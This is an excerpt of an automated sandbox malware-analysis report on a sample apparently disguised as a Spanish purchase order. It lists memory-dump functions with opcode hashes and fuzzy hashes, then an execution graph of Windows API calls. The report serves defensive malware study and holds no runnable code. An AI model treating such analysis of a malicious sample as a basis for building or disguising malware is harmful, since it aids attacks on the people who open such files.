                                            Function 058BA6B6 Relevance: .0, Instructions: 18COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 08c51205b07adfc15f212c8b10b3f39682505e014d4bcf26a4441602baf86241
                                            • Instruction ID: 822630b4726159e0f5d19f427b63dbe347d3736365820febffc461ada2a83604
                                            • Opcode Fuzzy Hash: 08c51205b07adfc15f212c8b10b3f39682505e014d4bcf26a4441602baf86241
                                            • Instruction Fuzzy Hash: 8ED05E75A4500CCB8B04DAE8E4448ECBB39F74A211B004422C903E3210D3704915CA08
                                            Function 058B8507 Relevance: .0, Instructions: 17COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a6d55a3d19859e3dd2e4ef041c82eb8f7a6aa10d39e50c8f25b732ca67715f05
                                            • Instruction ID: 8f7ddfe00b42f605085688f98a64891780be618b17a6d62020eeb0d31c15291e
                                            • Opcode Fuzzy Hash: a6d55a3d19859e3dd2e4ef041c82eb8f7a6aa10d39e50c8f25b732ca67715f05
                                            • Instruction Fuzzy Hash: 59E0E2B72014489BD205DB29CE999957BB4FF31288358489C85C98B623C622A42BCB8B
                                            Function 058BFC78 Relevance: .0, Instructions: 16COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 64e64c01328cb471c750177914775c3c9388bacf6641dcc97e9a725576a09fe9
                                            • Instruction ID: cc4edcd7019f2e7cad1ed0ed68e01d0cdd4b3669cdc994f4968362ac29e1b0e5
                                            • Opcode Fuzzy Hash: 64e64c01328cb471c750177914775c3c9388bacf6641dcc97e9a725576a09fe9
                                            • Instruction Fuzzy Hash: 98D012B0D4031DAFE740EFB989117AEBBF5AF04204F508965C414E6344EBB456409F91
                                            Function 058B8D10 Relevance: .0, Instructions: 14COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 50ae9782e8c41e81431bb73127341d16f9d39f53c254331efaaa58a50bb3899b
                                            • Instruction ID: 28b09bb2f58013f9c58de1ae96b185781e14df2a939a89940317875cd97d5813
                                            • Opcode Fuzzy Hash: 50ae9782e8c41e81431bb73127341d16f9d39f53c254331efaaa58a50bb3899b
                                            • Instruction Fuzzy Hash: D3D0A9361040487BCB026F80E800BE87F2ABB49354F088040F7940E133E6338163FB90
                                            Function 058BE030 Relevance: .0, Instructions: 14COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 97ebb4d9a2b76770ad66c94e9d2a3e37f624fb01e525dbd7602c3f70958d665e
                                            • Instruction ID: fec07cb799934e9d63d9e44e9a01769b74c6f53e19596f9e797bf4da62e90f7b
                                            • Opcode Fuzzy Hash: 97ebb4d9a2b76770ad66c94e9d2a3e37f624fb01e525dbd7602c3f70958d665e
                                            • Instruction Fuzzy Hash: ECD012322102095F9B41EAE4F805D927BEDBB547007008423F944CB630EB61E925D792
                                            Function 058B8D20 Relevance: .0, Instructions: 10COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0e1e214324e1aeb163d0d2e5271ff83c7e7bb0fce6bdcfc4e6e5166803892f57
                                            • Instruction ID: 43482bd53f12954fe4d1501334347c1b73529d502ebdf40095c32c12cdef208f
                                            • Opcode Fuzzy Hash: 0e1e214324e1aeb163d0d2e5271ff83c7e7bb0fce6bdcfc4e6e5166803892f57
                                            • Instruction Fuzzy Hash: A6C00236144108BBCB026A85D805E59BF2ABB55694F148155F7040D162D673D662AB90
                                            Function 058BBEB8 Relevance: .0, Instructions: 9COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2a2cfaf43a623162f697104460bb8aeeaa8a66632917ac6a976be6d8f205af51
                                            • Instruction ID: b05633700b79792de308e7f25182460476679a1f8aaf445cc19ab34d89b2aed0
                                            • Opcode Fuzzy Hash: 2a2cfaf43a623162f697104460bb8aeeaa8a66632917ac6a976be6d8f205af51
                                            • Instruction Fuzzy Hash: 93C08C3D1041C97DCB029B349918FC1BFF5BB1A208F469890D0C80AA32C1208417FF23
                                            Function 058BAA58 Relevance: .0, Instructions: 9COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 020dd6d5cc08158e2882808099a6b106abfef7021b2b164d293d7b9b5c5a7ef0
                                            • Instruction ID: b9f58fe9fe844e85b620f692af4d8d1efd43a731e3ca2e501aa5513fd66f0478
                                            • Opcode Fuzzy Hash: 020dd6d5cc08158e2882808099a6b106abfef7021b2b164d293d7b9b5c5a7ef0
                                            • Instruction Fuzzy Hash: 40D0EA74E0820DCFEB14CF98D544AEDB7BAEB49305F205019D82AA2341C7B86E428F40
                                            Function 058BC13C Relevance: .0, Instructions: 8COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7aecca6775395eb81bde78820d7c5a0c903910945a25568b9412b09ce9900a12
                                            • Instruction ID: 05f16455dcc732de9870adf8ebe10e7641dee05e55e6d39dfa55283539d6ada4
                                            • Opcode Fuzzy Hash: 7aecca6775395eb81bde78820d7c5a0c903910945a25568b9412b09ce9900a12
                                            • Instruction Fuzzy Hash: 00B0127A359206F3A000777849D5AFAF446FBEB704B00CC173705E0210C8A68C65D12F
                                            Function 058BA0C1 Relevance: .0, Instructions: 6COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6eb0dd56a21c0f78096d75533c208ab64dcc5ddb31bd78a91994c990a3f20764
                                            • Instruction ID: 4dc9d96574ef965771a636dea123649e33679397b7091331fbc0673dfa9b399c
                                            • Opcode Fuzzy Hash: 6eb0dd56a21c0f78096d75533c208ab64dcc5ddb31bd78a91994c990a3f20764
                                            • Instruction Fuzzy Hash: B7B0120640C2C10AFB015339AC00353BF801302805F0C9A8C80C081661E35800099611
                                            Function 058B773C Relevance: .0, Instructions: 5COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 85b57f60eaf085a060667c93cef7e51b7ef2ed73bb67df153b02f99bc3e02e8c
                                            • Instruction ID: 50a8709275704957d7e14eee93901d94681e89fc0ef33ee12042728613d189aa
                                            • Opcode Fuzzy Hash: 85b57f60eaf085a060667c93cef7e51b7ef2ed73bb67df153b02f99bc3e02e8c
                                            • Instruction Fuzzy Hash: 20B01221D0162AC4D444D6B4C7408046A97D1806003004A290809C62A7C090EC413541

                                            Non-executed Functions

                                            Function 058B6F50 Relevance: 1.4, Strings: 1, Instructions: 108COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ax^
                                            • API String ID: 0-994873808
                                            • Opcode ID: 9d7009f79715375611752c006c6d072931ae9352f9c2f866ccf47ef3d952da13
                                            • Instruction ID: 9b1afc43d0fc9fa7e5481a20e62010d21a983c3ef149aa4c787c12b5d0e49517
                                            • Opcode Fuzzy Hash: 9d7009f79715375611752c006c6d072931ae9352f9c2f866ccf47ef3d952da13
                                            • Instruction Fuzzy Hash: 3A4193B1F1421ACFDB40CF9AC8859AEFBFAFB88244B158166E905EB351D274DD018B91
                                            Function 058B6F60 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ax^
                                            • API String ID: 0-994873808
                                            • Opcode ID: 0bba3b3c7b1cf1ac48323ace82f6c6b4b8e94b5e3ff2a3f44e8b9ff3d39f236f
                                            • Instruction ID: 58d023c90679c65ee906d4c515034cca1e271dc2e6231ad1f0155c025d049e53
                                            • Opcode Fuzzy Hash: 0bba3b3c7b1cf1ac48323ace82f6c6b4b8e94b5e3ff2a3f44e8b9ff3d39f236f
                                            • Instruction Fuzzy Hash: 9B41A2B1F1421ECBDB40CF9AC8859AEF7FAFB88244B158066E905EB351D2B4DD018B91
                                            Function 04E2EFD8 Relevance: .4, Instructions: 413COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2167665332.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4e20000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 45be3b78c7b0becfa279d70e8ae7b4d39d1ba4935f4eef17893459274fe0bb8d
                                            • Instruction ID: 0af2ccccc0eace30b1c13bdaccea01ff3896be721288bd2004c9b5bb44581b02
                                            • Opcode Fuzzy Hash: 45be3b78c7b0becfa279d70e8ae7b4d39d1ba4935f4eef17893459274fe0bb8d
                                            • Instruction Fuzzy Hash: 58E19B717007248FEB29EB79C660B6BB7F6AF89708F14846ED146CB290DB35E801DB51
                                            Function 04E25588 Relevance: .3, Instructions: 312COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2167665332.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4e20000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6ad91ac8d2a626c9c776b133a0eeed9203bc3ca66133c7b99a5e36498bcd74fc
                                            • Instruction ID: 1ce9b5fe22f9fee72e54880309cf1a7b85ee5e324638e418f42448aefc610bfe
                                            • Opcode Fuzzy Hash: 6ad91ac8d2a626c9c776b133a0eeed9203bc3ca66133c7b99a5e36498bcd74fc
                                            • Instruction Fuzzy Hash: CBE10974E002299FDB14DFA8C680AAEFBF2BF89305F249569D414AB356D730AD41CF60
                                            Function 04E24D18 Relevance: .3, Instructions: 312COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2167665332.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4e20000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b5e1fecf875aa19cc9d84d819f38fd55d1c3a1c7a66fc5989aa8df837b616f2b
                                            • Instruction ID: 68b732966ab77f79485ba9f2983e8c6c472f8ac62d631556337d973eb92b2ce0
                                            • Opcode Fuzzy Hash: b5e1fecf875aa19cc9d84d819f38fd55d1c3a1c7a66fc5989aa8df837b616f2b
                                            • Instruction Fuzzy Hash: 0BE1EA74E006299FDB14DFA9C680AAEFBF2BF89305F249159D414AB356D730AD42CF60
                                            Function 04E248E0 Relevance: .3, Instructions: 312COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2167665332.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4e20000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5888ae23904d5cc462fde01a703e9d62063ff6033f7f30a8132ac2039a4897f3
                                            • Instruction ID: 782a42c5d9908bc0fa08ecf29d1bebba36f21a65194a77198cd0f23989b8ecac
                                            • Opcode Fuzzy Hash: 5888ae23904d5cc462fde01a703e9d62063ff6033f7f30a8132ac2039a4897f3
                                            • Instruction Fuzzy Hash: ECE1E974E002298FDB14DFA9C680AAEFBF2BF89305F249169D455AB356D730AD41CF60
                                            Function 04E25150 Relevance: .3, Instructions: 312COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2167665332.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4e20000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4883f677df3f9b54489d4055402a0998a1e44c42daad1f1c3f925671aafc47d7
                                            • Instruction ID: 9a72577403f42dd335d3e2ab75b336ad6848cc48c2ebee905555534e29aaabac
                                            • Opcode Fuzzy Hash: 4883f677df3f9b54489d4055402a0998a1e44c42daad1f1c3f925671aafc47d7
                                            • Instruction Fuzzy Hash: C1E10A74E006299FDB14DF98C680AAEFBF2BF89305F249169D415AB356D730AD42CF60
                                            Function 04E27278 Relevance: .3, Instructions: 312COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2167665332.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4e20000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9a5554f7d4278ee475e895e7601d9043ad387a082b418a58bfda9031c76b6b18
                                            • Instruction ID: 8eddf0aca4ce7218a724594a3f7f0ab8cb5c6ff9be078a05fc65087d650342f7
                                            • Opcode Fuzzy Hash: 9a5554f7d4278ee475e895e7601d9043ad387a082b418a58bfda9031c76b6b18
                                            • Instruction Fuzzy Hash: E6E1FB74E006298FDB14DFA9C680AAEFBF2BF89305F249169D414AB356D730AD41CF61
                                            Function 058BCF60 Relevance: .3, Instructions: 264COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4e53d195c624ff810fcc375f9457d09d6134a358b4202a10f41d29a154fef773
                                            • Instruction ID: 591f2e6be29df2eac9e97f93b6ce71f5caaedf00fb29a9eba0fa2a7a8a8253fc
                                            • Opcode Fuzzy Hash: 4e53d195c624ff810fcc375f9457d09d6134a358b4202a10f41d29a154fef773
                                            • Instruction Fuzzy Hash: 00D1E335D20A5ACACB10EBB4D950A99F7B1FF99300F50C79AD50A37211EB70AAC5CF91
                                            Function 058B46B0 Relevance: .1, Instructions: 138COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 87673a652ffc2548cb9cd395abe60fc7b5ec69ad941b8ce0429f71c3c92806e0
                                            • Instruction ID: 001cf4d9cb317c39e32b7342ca163851654c7048fff353dbeab9e572a403e146
                                            • Opcode Fuzzy Hash: 87673a652ffc2548cb9cd395abe60fc7b5ec69ad941b8ce0429f71c3c92806e0
                                            • Instruction Fuzzy Hash: 8B41C431B104598FEB08DF69C9556BEBBFBFB89205F11406AD942EB361CA718D01CB91
                                            Function 058B46C0 Relevance: .1, Instructions: 133COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e4a55ab635c7d828b91e52ba4ec1dfe099061e960cf2a0b7bfeba9ad0734a746
                                            • Instruction ID: 71957af6085da0db242b9cc0c23ab47d50c95ffd9f8f1f1d05ae7544ff70e85e
                                            • Opcode Fuzzy Hash: e4a55ab635c7d828b91e52ba4ec1dfe099061e960cf2a0b7bfeba9ad0734a746
                                            • Instruction Fuzzy Hash: 4041E531B100598FEB08DF69C855ABEBBFBFB89205F11406AD942EB361DA718D018B91
                                            Function 058BD510 Relevance: .1, Instructions: 113COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3f2564f39face709db05b7756b48f39f79479aff011462bfcc6332d54b35ebc9
                                            • Instruction ID: e463bf903be500ca22d9ef18d473aebe773090d0c6b864dce579e219c1402834
                                            • Opcode Fuzzy Hash: 3f2564f39face709db05b7756b48f39f79479aff011462bfcc6332d54b35ebc9
                                            • Instruction Fuzzy Hash: 0641D731B0511AEBDB04DEA8C5806EEFB7BFFC8218B104516ED05EB354D671CE418B82
                                            Function 058B6408 Relevance: .1, Instructions: 106COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 993974b552b53e55626cc0c7afe801e3abb03737625aca2e6d6ff137e8fa9622
                                            • Instruction ID: 1108c973b0d56db0d7606c67aaf40bd5be89d6f84871db46ff41ca0ae7988778
                                            • Opcode Fuzzy Hash: 993974b552b53e55626cc0c7afe801e3abb03737625aca2e6d6ff137e8fa9622
                                            • Instruction Fuzzy Hash: C741F631650A06CFD710CB6AC585A9ABBF6FF84350F44C42AE45ACBB54E274E951CF42
                                            Function 058B6418 Relevance: .1, Instructions: 104COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 82b446c626a17ce313352f10b252bfd65ceb61f70176d810620e95db002732cf
                                            • Instruction ID: 18f2b7d68462db46303bb39a34d46303796cb88a2db610dd2a1488fc5e9f98ac
                                            • Opcode Fuzzy Hash: 82b446c626a17ce313352f10b252bfd65ceb61f70176d810620e95db002732cf
                                            • Instruction Fuzzy Hash: AC41E631650A06CFD710CB6AC584A9AB7F6FF84314B44C43AE55ACBB64E274ED51CF42

                                            Execution Graph

                                            Execution Coverage:1.3%
                                            Dynamic/Decrypted Code Coverage:2.7%
                                            Signature Coverage:5.8%
                                            Total number of Nodes:554
                                            Total number of Limit Nodes:69
                                            execution_graph 99281 41f0f0 99284 41b970 99281->99284 99285 41b996 99284->99285 99292 409d40 99285->99292 99287 41b9a2 99288 41b9c3 99287->99288 99300 40c1c0 99287->99300 99290 41b9b5 99336 41a6b0 99290->99336 99339 409c90 99292->99339 99294 409d4d 99295 409d54 99294->99295 99351 409c30 99294->99351 99295->99287 99301 40c1e5 99300->99301 99768 40b1c0 99301->99768 99303 40c23c 99772 40ae40 99303->99772 99305 40c262 99335 40c4b3 99305->99335 99781 4143a0 99305->99781 99307 40c2a7 99307->99335 99784 408a60 99307->99784 99309 40c2eb 99309->99335 99791 41a500 99309->99791 99313 40c341 99314 40c348 99313->99314 99803 41a010 99313->99803 99315 41bdc0 2 API calls 99314->99315 99317 40c355 99315->99317 99317->99290 99319 40c392 99320 41bdc0 2 API calls 99319->99320 99321 40c399 99320->99321 99321->99290 99322 40c3a2 99323 40f4a0 3 API calls 99322->99323 99324 40c416 99323->99324 99324->99314 99325 40c421 99324->99325 99326 41bdc0 2 API calls 99325->99326 99327 40c445 99326->99327 99809 41a060 99327->99809 99330 41a010 2 API calls 99331 40c480 99330->99331 99331->99335 99814 419e20 99331->99814 99334 41a6b0 2 API calls 99334->99335 99335->99290 99337 41af60 LdrLoadDll 99336->99337 99338 41a6cf ExitProcess 99337->99338 99338->99288 99340 409ca3 99339->99340 99390 418bc0 LdrLoadDll 99339->99390 99370 418a70 99340->99370 99343 409cb6 99343->99294 99344 409cac 99344->99343 99373 41b2b0 99344->99373 99346 409cf3 99346->99343 99384 409ab0 99346->99384 99348 409d13 99391 409620 LdrLoadDll 99348->99391 99350 409d25 99350->99294 99743 41b5a0 99351->99743 99354 41b5a0 LdrLoadDll 99355 409c5b 99354->99355 99356 41b5a0 LdrLoadDll 99355->99356 99357 409c71 99356->99357 99358 40f180 99357->99358 99359 40f199 99358->99359 99751 40b040 99359->99751 99361 40f1ac 99755 41a1e0 99361->99755 99365 40f1d2 99368 40f1fd 99365->99368 99761 41a260 99365->99761 99367 41a490 2 API calls 99369 409d65 99367->99369 99368->99367 99369->99287 99392 41a600 99370->99392 99374 41b2c9 99373->99374 99405 414a50 99374->99405 99376 41b2e1 99377 41b2ea 99376->99377 99444 41b0f0 99376->99444 99377->99346 99379 41b2fe 99379->99377 99462 419f00 99379->99462 99721 407ea0 99384->99721 99386 409ad1 99386->99348 99387 409aca 99387->99386 99734 408160 99387->99734 99390->99340 99391->99350 99395 41af60 99392->99395 99394 418a85 99394->99344 99396 41af70 99395->99396 99397 41af92 99395->99397 99399 414e50 99396->99399 99397->99394 99400 414e6a 99399->99400 99401 414e5e 99399->99401 99400->99397 99401->99400 99404 4152d0 LdrLoadDll 99401->99404 99403 414fbc 99403->99397 99404->99403 99406 414d85 99405->99406 99416 414a64 99405->99416 99406->99376 99409 414b90 99473 41a360 99409->99473 99410 414b73 99531 41a460 LdrLoadDll 99410->99531 99413 414b7d 99413->99376 99414 414bb7 99415 41bdc0 2 API calls 99414->99415 99418 414bc3 99415->99418 99416->99406 99470 419c50 99416->99470 99417 414d49 99420 41a490 2 API calls 99417->99420 99418->99413 99418->99417 99419 414d5f 99418->99419 99424 414c52 99418->99424 99540 414790 LdrLoadDll NtReadFile NtClose 99419->99540 99421 414d50 99420->99421 99421->99376 99423 414d72 99423->99376 99425 414cb9 99424->99425 99427 414c61 99424->99427 99425->99417 99426 414ccc 99425->99426 99533 41a2e0 99426->99533 99429 414c66 99427->99429 99430 414c7a 99427->99430 99532 414650 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 99429->99532 99433 414c97 99430->99433 99434 414c7f 99430->99434 99433->99421 99489 414410 99433->99489 99477 4146f0 99434->99477 99436 414c70 99436->99376 99438 414d2c 99537 41a490 99438->99537 99439 414c8d 99439->99376 99442 414caf 99442->99376 99443 414d38 99443->99376 99445 41b101 99444->99445 99446 41b113 99445->99446 99558 41bd40 99445->99558 99446->99379 99448 41b134 99561 414070 99448->99561 99450 41b180 99450->99379 99451 41b157 99451->99450 99452 414070 3 API calls 99451->99452 99454 41b179 99452->99454 99454->99450 99593 415390 99454->99593 99455 41b20a 99456 41b21a 99455->99456 99687 41af00 LdrLoadDll 99455->99687 99603 41ad70 99456->99603 99459 41b248 99682 419ec0 99459->99682 99463 419f1c 99462->99463 99464 41af60 LdrLoadDll 99462->99464 99715 18a2c0a 99463->99715 99464->99463 99465 419f37 99467 41bdc0 99465->99467 99718 41a670 99467->99718 99469 41b359 99469->99346 99471 41af60 LdrLoadDll 99470->99471 99472 414b44 99471->99472 99472->99409 99472->99410 99472->99413 99474 41a37c NtCreateFile 99473->99474 99475 41af60 LdrLoadDll 99473->99475 99474->99414 99475->99474 99478 41470c 99477->99478 99479 41a2e0 LdrLoadDll 99478->99479 99480 41472d 99479->99480 99481 414734 99480->99481 99482 414748 99480->99482 99483 41a490 2 API calls 99481->99483 99484 41a490 2 API calls 99482->99484 99485 41473d 99483->99485 99486 414751 99484->99486 99485->99439 99541 41bfd0 LdrLoadDll RtlAllocateHeap 99486->99541 99488 41475c 99488->99439 99490 41445b 99489->99490 99491 41448e 99489->99491 99492 41a2e0 LdrLoadDll 99490->99492 99493 4145d9 99491->99493 99497 4144aa 99491->99497 99495 414476 99492->99495 99494 41a2e0 LdrLoadDll 99493->99494 99501 4145f4 99494->99501 99496 41a490 2 API calls 99495->99496 99498 41447f 99496->99498 99499 41a2e0 LdrLoadDll 99497->99499 99498->99442 99500 4144c5 99499->99500 99503 4144e1 99500->99503 99504 4144cc 99500->99504 99554 41a320 LdrLoadDll 99501->99554 99505 4144e6 99503->99505 99506 4144fc 99503->99506 99508 41a490 2 API calls 99504->99508 99509 41a490 2 API calls 99505->99509 99517 414501 99506->99517 99542 41bf90 99506->99542 99507 41462e 99510 41a490 2 API calls 99507->99510 99511 4144d5 99508->99511 99512 4144ef 99509->99512 99514 414639 99510->99514 99511->99442 99512->99442 99513 414513 99513->99442 99514->99442 99517->99513 99545 41a410 99517->99545 99518 414567 99522 41457e 99518->99522 99553 41a2a0 LdrLoadDll 99518->99553 99520 414585 99523 41a490 2 API calls 99520->99523 99521 41459a 99524 41a490 2 API calls 99521->99524 99522->99520 99522->99521 99523->99513 99525 4145a3 99524->99525 99526 4145cf 99525->99526 99548 41bb90 99525->99548 99526->99442 99528 4145ba 99529 41bdc0 2 API calls 99528->99529 99530 4145c3 99529->99530 99530->99442 99531->99413 99532->99436 99534 414d14 99533->99534 99535 41af60 LdrLoadDll 99533->99535 99536 41a320 LdrLoadDll 99534->99536 99535->99534 99536->99438 99538 41a4ac NtClose 99537->99538 99539 41af60 LdrLoadDll 99537->99539 99538->99443 99539->99538 99540->99423 99541->99488 99544 